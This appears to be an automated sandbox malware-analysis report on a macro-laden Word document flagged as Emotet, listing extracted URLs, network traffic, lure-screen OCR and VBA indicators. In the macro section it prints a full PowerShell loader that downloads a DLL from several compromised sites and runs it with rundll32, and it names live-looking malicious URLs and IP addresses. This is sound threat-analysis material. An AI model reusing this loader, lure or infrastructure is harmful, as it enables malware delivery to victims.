              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://onedrive.live.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://osi.office.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://otelrules.azureedge.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://outlook.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://outlook.office.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://outlook.office365.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://outlook.office365.com/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://pages.store.office.com/review/query
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://roaming.edog.
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://settings.outlook.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://staging.cortana.ai
              Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drString found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000008.00000002.309792794.000001C41943A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://tasks.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://webshell.suite.office.com
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://wus2.contentsync.
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://wus2.pagecontentsync.
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drString found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/
              Source: unknownDNS traffic detected: queries for: thepilatesstudionj.com
              Source: global trafficHTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Nov 2021 10:03:15 GMTContent-Type: text/htmlContent-Length: 162Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
              Source: unknownTCP traffic detected without corresponding DNS query: 168.197.250.14
              Source: unknownTCP traffic detected without corresponding DNS query: 168.197.250.14
              Source: unknownTCP traffic detected without corresponding DNS query: 168.197.250.14
              Source: unknownTCP traffic detected without corresponding DNS query: 45.79.33.48
              Source: unknownTCP traffic detected without corresponding DNS query: 45.79.33.48
              Source: unknownTCP traffic detected without corresponding DNS query: 45.79.33.48
              Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A5A30 GetOpenClipboardWindow,CloseClipboard,GetMenuCheckMarkDimensions,IsSystemResumeAutomatic,

              E-Banking Fraud:

              barindex
              Yara detected EmotetShow sources
              Source: Yara matchFile source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type h
              Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for protected documents You have to press "ENABLE
              Source: Screenshot number: 4Screenshot OCR: protected documents You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms D
              Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type here to search m % -
              Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese butt
              Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. C, Previewing is not available for protected documents. O You have to press
              Source: Screenshot number: 8Screenshot OCR: protected documents. O You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview t
              Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese buttons to quickly custo
              Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
              Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
              Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
              Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
              Powershell drops PE fileShow sources
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\13791789.dllJump to dropped file
              Document contains an embedded VBA macro which may execute processesShow sources
              Source: VBA code instrumentationOLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
              Source: 1711.docOLE indicator application name: unknown
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE indicator application name: unknown
              Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.drOLE indicator application name: unknown
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046EE760
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046ECF60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046ECF70
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A5730
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A6620
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BA1F0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615D3074
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BA29D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615AF700
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615C3780
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BA60F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615CC6FE
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615D1929
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BA8B9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BAB80
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BDA2D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A2A80
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BDC5D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B7C47
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B1CD0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615BAE3B
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A5EE0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067441E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068CAA8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006843B3
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068406E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00671C76
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00672A46
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00673845
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00672043
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068E441
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067A048
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00679A57
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00672654
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067EC27
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067D223
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00679E22
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00685220
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00691A3C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068F83F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00674C00
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00671A0A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067220A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00678C09
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067F41F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00681C10
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067E21C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068AEEB
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068ECE3
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006730F6
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068A8F0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068DEF4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068BEC9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00680ADE
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006908D1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00687ED1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068CCD4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006844AA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067FEA0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067DAAE
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006878A5
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068D6A7
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006890BA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00675AB2
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006898BD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00684E8A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068748A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00677283
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067CC8D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00690687
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067AC95
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068AC9B
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00673C91
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068D091
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068056A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00681F6B
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068577E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00673345
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068F14D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00691343
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00673F5C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067C158
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0069292B
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00676B25
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00675923
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00690B34
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00673502
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00672309
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068FD10
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067251C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068BFE8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006755E8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006903F1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067C5FE
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00676FC4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_006925C3
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067A3DF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00684BAA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00689DA1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00682FA2
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067BFB6
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00687BB2
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068B1B5
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00679384
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00684D8D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067758F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00674F8E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068D99A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0067FD91
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00691193
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0068B397
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
              Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
              Source: C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 615B5BE0 appears 49 times
              Source: 1711.docOLE, VBA macro line: Private Sub Document_Open()
              Source: VBA code instrumentationOLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_Open
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A13F0 zwxnlwalmcbgmt,
              Source: 1711.docOLE indicator has summary info: false
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE indicator has summary info: false
              Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.drOLE indicator has summary info: false
              Source: 1711.docOLE indicator, VBA macros: true
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE indicator, VBA macros: true
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@27/26@2/24
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615AEBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,
              Source: 1711.docOLE document summary: title field not present or empty
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE document summary: title field not present or empty
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE document summary: author field not present or empty
              Source: ~DFE2F261E3909AA4D4.TMP.0.drOLE document summary: edited time not present or 0
